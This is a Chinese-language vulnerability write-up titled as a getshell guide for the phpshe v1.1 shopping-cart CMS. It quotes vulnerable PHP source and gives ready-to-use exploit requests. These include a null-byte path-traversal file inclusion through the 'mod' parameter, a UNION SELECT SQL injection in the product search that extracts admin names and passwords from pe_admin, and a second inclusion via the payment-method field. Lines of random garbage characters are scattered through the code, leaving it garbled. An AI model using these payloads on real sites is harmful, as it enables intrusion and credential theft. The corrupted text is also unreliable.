phpshe v1.1多处SQL注入和文件包含漏洞Getshell

admin

/*******************************************************/
/* Phpshe v1.1 Vulnerability
/* ========================
/* By: : Kn1f3
/* E-Mail : 681796@qq.com
/*******************************************************/
0×00 整体大概参数传输
2 I/ t/ w' y2 v( S3 `8 N. a6 l4 F
6 ?8 N$ j0 B" I6 I& ^( W/ z# Y
! e3 `  E0 \* K, O1 a
5 y" Y( o$ w9 {) e1 I( b; y% f//common.php
if (get_magic_quotes_gpc()) {
!empty($_GET) && extract(pe_trim(pe_stripslashes($_GET)), EXTR_PREFIX_ALL, '_g');
!empty($_POST) && extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');
% _: Q  Z$ o+ o4 e) Z  t1 r# M}
else {
!empty($_GET) && extract(pe_trim($_GET),EXTR_PREFIX_ALL,'_g');
!empty($_POST) && extract(pe_trim($_POST),EXTR_PREFIX_ALL,'_p');
- |1 s+ t% V* E}
session_start();
4 n' w' g  F3 m  i; O" ~8 a!empty($_SESSION) && extract(pe_trim($_SESSION),EXTR_PREFIX_ALL,'_s');
4 P, \8 r) J5 _# e+ E!empty($_COOKIE) && extract(pe_trim(pe_stripslashes($_COOKIE)),EXTR_PREFIX_ALL,'_c');

0×01 包含漏洞
4 ^. v3 E; K+ I/ s) Z

; ~" F9 |- E1 @4 A- K' i! m//首页文件
( O, ?/ K0 o6 o0 w) Z3 q<!--?php include('common.php'); $cache_category = cache::get('category'); $cache_category_arr = cache::get('category_arr'); $cache_class = cache::get('class'); $cache_ad = cache::get('ad'); $cache_link = cache::get('link'); $cache_page = cache::get('page'); $web_qq = $cache_setting['web_qq']['setting_value'] ? explode(',', $cache_setting['web_qq']['setting_value']) : array(); $cart_num = pe_login('user') ? $db--->pe_num('cart', array('user_id'=>$_s_user_id)) : (unserialize($_c_cart_list) ? count(unserialize($_c_cart_list)) : 0);
include("{$pe['path_root']}module/{$module}/{$mod}.php");  //$mod可控造成“鸡肋”包含漏洞
pe_result();
?>
//common 文件 第15行开始
" w$ x/ {) `& furl路由配置
6 v- _. b! a3 T: [- V5 {) x8 @$module = $mod = $act = 'index';
$mod = $_POST['mod'] ? $_POST['mod'] : ($_GET['mod'] ? $_GET['mod'] : $mod);
$act = $_POST['act'] ? $_POST['act'] : ($_GET['act'] ? $_GET['act'] : $act);
$id = $_POST['id'] ? $_POST['id'] : ($_GET['id'] ? $_GET['id'] : $id);
$ R' \1 _  t) I' W9 T' g0 b* Y8 d" M//exp：http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%00
9 J/ h) o; H3 x2 B- `3 o9 O

& ^- W; o% a) N: P% Z* k  D
( K. \1 v2 \3 l2 P 0×02 搜索注入
1 k5 ^  p$ d. \6 G# |4 q! I, c% @
: F; N% I! ^1 ~" ?' t$ P<code id="code2">

//product.php文件
5 u. m, S) K+ s, ^) ~% {( x" Mcase 'list':
  O! V- f# ~8 g1 P' r+ f# W$category_id = intval($id);
$info = $db->pe_select('category', array('category_id'=>$category_id));
  G8 ?7 [2 O1 e" q6 z//搜索
$ K$ w, ]4 Z: v' s$sqlwhere = " and `product_state` = 1";
pe_lead('hook/category.hook.php');
if ($category_id) {
where .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";
}
$_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'"; //keyword变量未进行有效的sql语句过滤
0 p, L9 h* N2 @- `if ($_g_orderby) {
$orderby = explode('_', $_g_orderby);
$sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";
( ~* Q3 Z. J  A}
" x; j- k" s. Z- `! U" a) H# |else {
$sqlwhere .= " order by `product_id` desc";
( R( L9 S; R0 C  a}
$info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));
. @$ e. P3 h4 j- s7 X; _//热卖排行
3 o9 p, ?8 {0 |, N6 X$product_hotlist = product_hotlist();
; f; S6 x0 Q- _( J, s//当前路径
, q$ s; t8 u- i1 B# M+ c$nowpath = category_path($category_id);
$seo = pe_seo($info['category_name']);
include(pe_tpl('product_list.html'));
//跟进selectall函数库
public function pe_selectall($table, $where = '', $field = '*', $limit_page = array())
/ G/ ~6 C" a. Q5 ~- ?  \  h{
//处理条件语句
$sqlwhere = $this->_dowhere($where);
return $this->sql_selectall("select {$field} from `".dbpre."{$table}` {$sqlwhere}", $limit_page);
}
//exp
8 L3 k5 ~4 x9 l1 ?5 f' xproduct/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='1
" k0 S3 x" O! g9 a* N3 C3 \

</code>
+ W8 A% ~% B9 L2 V' W, b, Z( X
0×03 包含漏洞2

4 d3 ~8 M9 I4 o" z: ?<code id="code3">

//order.php

case 'pay':

$order_id = pe_dbhold($_g_id);

% a! T1 c- X8 s- b% |& ?$cache_payway = cache::get('payway');

( ?! a$ ]3 n' V( Q4 Y4 {0 \foreach($cache_payway as $k => $v) {

: D- f1 ^* o" u  _# Z$ r+ t5 m8 b+ V$cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);

if ($k == 'bank') {

$cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);

2 V' v' `) S7 \: ]' s0 @}

}

" d+ Z6 t9 e( _9 O6 n$order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));

& h% S6 q+ S1 H!$order['order_id'] && pe_error('订单号错误...');

if (isset($_p_pesubmit)) {

# V6 o- m  H# b* ?$ T% dif ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {

. P( P! J& n% F7 q$info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));

foreach ($info_list as $v) {

# V, A6 G+ P9 \$ m$order['order_name'] .= "{$v['product_name']};";
& h! `9 K' D+ f

}

7 k* v8 K: x+ p4 B) Oecho '正在为您连接支付网站，请稍后...';

include("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");

}//当一切准备好的时候就可以进行"鸡肋包含了"

+ G/ t$ J' P$ B  O- |! z8 ^9 ~0 K% helse {

pe_error('支付错误...');

* Z3 w6 i2 r1 u2 L9 c0 W1 N}

}

$seo = pe_seo('选择支付方式');

include(pe_tpl('order_pay.html'));

) K$ Y! _+ [& s- zbreak;

}

//exp：

//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001

//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code>
: I6 R3 m( D# N! n4 `& ~http://www.myhack58.com/Article/UploadPic/2013-4/20134161293183866.jpg